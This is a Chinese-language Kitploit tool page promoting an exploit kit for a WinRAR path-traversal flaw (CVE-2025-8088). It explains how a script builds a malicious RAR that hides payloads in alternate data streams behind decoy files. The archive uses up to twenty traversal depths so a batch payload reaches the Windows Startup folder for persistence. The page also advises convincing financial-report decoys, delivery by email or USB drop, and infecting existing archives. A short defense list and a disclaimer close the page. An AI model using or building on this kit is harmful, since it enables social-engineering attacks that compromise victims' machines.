Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8088-Multi-Document — 利用旧版WinRAR攻击系统,无需知道用户名(与其他项目不同) | Kitploit
工具/GitHubGitHub/pentestfunctions/cve-2025-8088-multi-document
持久化机制漏洞分析漏洞利用渗透测试学习与教育Payload 开发二进制利用
GitHubpentestfunctions/cve-2025-8088-multi-document

CVE-2025-8088-Multi-Document

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

利用旧版WinRAR攻击系统,无需知道用户名(与其他项目不同)

查看仓库
3641年前Kitploit 审核通过

WinRAR 路径遍历漏洞利用工具 (CVE-2025-8088) - 多层深度载荷部署

Payload

working

该 Python 脚本利用了 WinRAR 中的路径遍历漏洞 (CVE-2025-8088) ,通过使用多个相对路径深度将载荷部署到 Windows 启动文件夹。该漏洞利用工具会创建一个恶意的 RAR 存档,当受害者解压时,会将载荷写入不同目录深度下的启动文件夹中。


主要特性

  • 🎭 创建多个诱饵文件,可配置内容
  • 📁 通过备用数据流 (ADS) 嵌入载荷
  • 📈 生成多个遍历深度(默认 1–20 层)
  • 🔄 修补 RAR 头以利用路径遍历漏洞
  • 🎯 针对 Windows 启动文件夹实现持久化
  • ⚙️ 自动定位 WinRAR 安装路径
  • 🔒 重新计算 CRC 校验和以确保存档有效

核心概念

1. 多层深度遍历策略

脚本创建多个诱饵文件(默认 20 个),每个文件配置为遍历不同数量的父目录:

root@kitploit:~
NUM_DEPTHS = 20  # 不同的遍历深度数量

每个文件使用不同的路径深度:

root@kitploit:~
File1.txt  → ..\Startup\payload.bat
File2.txt  → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\(20 次)\Startup\payload.bat

✅ 确保无论受害者将存档解压到哪个位置(桌面、文档、下载或嵌套文件夹),至少有一个载荷能到达启动文件夹。


2. 诱饵文件自定义

诱饵文件默认包含通用文本,但应自定义以便进行真实的社会工程攻击:

root@kitploit:~
# 创建更具说服力的诱饵内容
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")

为什么要修改诱饵内容?

  • 使存档看起来合法
  • 增加受害者解压的可能性
  • 使用真实文件名/内容避免怀疑
  • 与预期的文档类型融为一体

3. 载荷配置

默认载荷是一个简单的批处理脚本,但可替换为任意可执行文件:

root@kitploit:~
PAYLOAD = "@echo off\necho Payload executed!\npause\n"

载荷位置:

root@kitploit:~
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
  • 在用户登录时执行
  • 对系统所有用户有效

4. 输出文件

最终的恶意 RAR 存档保存为:

root@kitploit:~
OUT_RAR = "exploit.rar"

Windows 构建环境要求

生成此漏洞利用工具需要 Windows 环境,原因如下:

  • 备用数据流 (ADS) 依赖
    使用 NTFS 专属特性附加载荷:

    root@kitploit:~
    ads_path = f"{decoy}:{placeholder}"  # Windows 特有的 NTFS 语法
    
  • WinRAR 可执行文件要求
    使用 WinRAR 的 Windows 命令行接口:

    root@kitploit:~
    subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
    
  • 路径结构兼容性
    针对 Windows 特定路径:

    root@kitploit:~
    RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
    
  • 载荷执行
    生成 Windows 批处理文件:

    root@kitploit:~
    @echo off
    start /B notepad.exe
    

使用方式

自定义配置:

root@kitploit:~
# 配置
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n"  # 你的实际载荷
DECOY_FILE_PREFIX = "Financial_Report_Q3_"     # 更具说服力的文件名

运行脚本:

root@kitploit:~
python CVE-2025-8088.py

分发输出文件:

  • 脚本生成 exploit.rar
  • 通过邮件、USB 掉落等方式分发

infect_premade_rarfiles.py

此版本的代码允许你运行类似于以下命令: python3 infect_premade_rarfiles.py website_backup.rar

它将提取所有文件,注入可注入的文件(如 .txt、srt、sql,并非所有文件类型都适用),然后创建准备好的 RAR 文件。


防御措施

  • 将 WinRAR 更新至最新版本
  • 禁止从不可信来源解压存档
  • 监控写入启动文件夹的行为
  • 使用能检测路径遍历尝试的安全软件

法律与道德声明

⚠️ 本工具仅用于 教育和安全研究目的。
未经明确许可,切勿将其用于任何系统。未经授权的使用是非法且不道德的。

下载工具